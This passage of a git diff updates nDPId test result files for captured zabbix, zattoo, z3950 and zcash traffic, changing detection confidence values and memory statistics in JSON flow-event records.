+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","packets-captured":31,"packets-processed":31,"total-skipped-flows":0,"total-l4-payload-len":4562,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1625070200217} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 31/31 @@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881859 bytes -~~ total memory freed........: 5881859 bytes -~~ total allocations/frees...: 118153/118153 +~~ total memory allocated....: 6009132 bytes +~~ total memory freed........: 6009132 bytes +~~ total allocations/frees...: 120913/120913 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 819 chars diff --git a/test/results/zabbix.pcap.out b/test/results/zabbix.pcap.out index 28868312b..c12afac1b 100644 --- a/test/results/zabbix.pcap.out +++ b/test/results/zabbix.pcap.out @@ -4,8 +4,8 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA85AdAAEAGTujAqENiwKhDGd9KJ0JwAdHUAAAAAKACchAH+wAAAgQFtAQCCAorwjXTAAAAAAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"OjUSPEK7RoQclwmZCABFAAA8AABAAEAGMvDAqEMZwKhDYidC30pw8XhkcAHR1aAScSDKPwAAAgQFtAQCCAorfUX3K8I10wEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA05AhAAEAGTu\/AqENiwKhDGd9KJ0JwAdHVcPF4ZYAQAOUH8wAAAQEICivCNdQrfUX3"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":39,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1572254070614} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869733 bytes -~~ total memory freed........: 5869733 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6003367 bytes +~~ total memory freed........: 6003367 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 685 chars diff --git a/test/results/zattoo.pcap.out b/test/results/zattoo.pcap.out index 3eff9bb52..ccd357bba 100644 --- a/test/results/zattoo.pcap.out +++ b/test/results/zattoo.pcap.out @@ -4,15 +4,15 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614851148233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148233,"pkt":"5kBKB+riApXG95NLCABFAAAw4ZkAAIAGAAAKZQACCmYAAgtyAbsk8\/zrAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614851148234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148234,"pkt":"ApXG95NL5kBKB+riCABFAAAw4ZMAAH8GRWYKZgACCmUAAgG7C3Ik9AFrJPP87HASgAGZ0wAAAgQFtAMDAQA="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614851148234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148234,"pkt":"5kBKB+riApXG95NLCABFAAAo4ZoAAIAGAAAKZQACCmYAAgtyAbsk8\/zsJPQBbFAQgAEU6QAAAAAAAAAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAw4b4AAIAGAAAKZQACCmYAAgt4AFAk9NudAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"ApXG95NL5kBKB+riCABFAAAw4bcAAH8GRUIKZgACCmUAAgBQC3gk9N+yJPTbnnASgAHePQAAAgQFtAMDAQA="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAo4b8AAIAGAAAKZQACCmYAAgt4AFAk9NueJPTfs1AQgAEU6QAAAAAAAAAA"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}} -00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}} -00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}} +00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-payload-len":11671,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1614851148254} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 @@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873862 bytes -~~ total memory freed........: 5873862 bytes -~~ total allocations/frees...: 118159/118159 +~~ total memory allocated....: 6007496 bytes +~~ total memory freed........: 6007496 bytes +~~ total allocations/frees...: 120921/120921 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1369 chars diff --git a/test/results/zcash.pcap.out b/test/results/zcash.pcap.out index 4daecaeb3..312d8d3a3 100644 --- a/test/results/zcash.pcap.out +++ b/test/results/zcash.pcap.out @@ -4,9 +4,9 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196094240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094240,"pkt":"fmgbW\/gUcIXCQA64CABFAAA8ux1AAEAGRaDAqAJcsiDE2deWI1qAnf85AAAAAKACchAV6gAAAgQFtAQCCApPjruwAAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196094322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094322,"pkt":"cIXCQA64fmgbW\/gUCABFAAA8AABAADMGDb6yIMTZwKgCXCNa15Yj5r0mgJ3\/OqAScSDZNwAAAgQFtAQCCArshW\/8T467sAEDAwk="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196094322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196094322,"pkt":"fmgbW\/gUcIXCQA64CABFAAA0ux5AAEAGRafAqAJcsiDE2deWI1qAnf86I+a9J4AQAOV4LAAAAQEICk+Ou8XshW\/8"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":88,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":88,"packets-processed":87,"total-skipped-flows":0,"total-l4-payload-len":6805,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1514196730496} -00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 